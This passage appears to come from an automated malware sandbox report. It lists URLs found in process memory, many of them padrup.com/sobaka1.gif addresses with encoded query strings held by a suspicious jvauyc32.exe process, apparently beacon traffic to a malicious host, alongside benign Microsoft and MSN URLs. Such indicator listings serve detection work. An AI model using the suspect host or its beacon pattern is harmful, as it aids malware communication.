        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?11fef99e=-1275740116c
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?11fef99e=-1275740116o
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?11fef99e=-1275740116w
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?12ba214d=-2095650533
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?12ba214d=-2095650533o
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?13de3bbe=-1294984786
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1495f698=690744624
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1543ef95=713547562
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?165b05c=164090500
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?16b31880=-867443584
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?16b31880=-8674435840#K
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1781559f=-1928855110
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?18285ae2=405297890
        Source: jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?18285ae2=4052978900
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?18285ae2=405297890z#
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?18b777d9=-977551672
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?195904b8=425264312
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?195904b8=425264312(
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1a078ca7=-1238050671
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1a078ca7=-1238050671&
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?20c2a09=3091646250
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?20c2a09=309164625X
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?25bc9cf1=633117937
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?269bb762=239207342
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?269bb762=2392073424
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?27c85804=-957761516
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?28892810=465574000
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?28892810=465574000L
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?28892810=465574000e
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?28892810=465574000el#
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?28892810=465574000h
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2924596e=690248046B
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: svchost.exe, 00000014.00000000.1740856753.000001697A665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4039173983.000001697A665000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
        Source: svchost.exe, 00000014.00000000.1740856753.000001697A665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4039173983.000001697A665000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
        Source: SearchApp.exe, 0000001E.00000000.2043154150.000001D61A247000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api
        Source: SearchApp.exe, 0000001E.00000000.2105052420.000001D61CBBB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mths.be/fromcodepoint
        Source: SearchApp.exe, 0000001E.00000000.2196009947.000001D62DC41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/web-widget?form=M
        Source: explorer.exe, 00000017.00000003.3086535581.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
        Source: StartMenuExperienceHost.exe, 0000001C.00000000.1921378411.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comx
        Source: SearchApp.exe, 0000001E.00000000.2058947153.000001D61A577000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
        Source: explorer.exe, 00000017.00000003.3086535581.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000001C.00000000.1921378411.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
        Source: SearchApp.exe, 0000001E.00000000.2105582330.000001D61CC23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
        Source: SearchApp.exe, 0000001E.00000000.2501571404.000001D6307D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/
        Source: SearchApp.exe, 0000001E.00000000.2105582330.000001D61CC23000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001E.00000000.2249686813.000001D62E02A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
        Source: SearchApp.exe, 0000001E.00000000.2060428257.000001D61A860000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWrite
        Source: SearchApp.exe, 0000001E.00000000.2219055917.000001D62DDD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
        Source: SearchApp.exe, 0000001E.00000000.2058427040.000001D61A4E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api1f8c91c6-235c-4050-8639-720df71e4e93d0438cf5-4bd5-480a-aeab-0
        Source: SearchApp.exe, 0000001E.00000000.2310174583.000001D62E0C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comRemovingScopeNarratorText2
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
        Source: SearchApp.exe, 0000001E.00000000.1983471827.000001CE12200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
        Source: SearchApp.exe, 0000001E.00000000.1983471827.000001CE12200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000017.00000000.1811548975.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3085615252.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
        Source: explorer.exe, 00000017.00000003.3086535581.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: StartMenuExperienceHost.exe, 0000001C.00000000.1921378411.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.coms
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bricks-breaker-deluxe-crusher/cg-9nnjfbfrzq3j&quot;
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w&quot;
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-checkers-multiplayer/cg-9p3c5sx31v9k&quot;
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
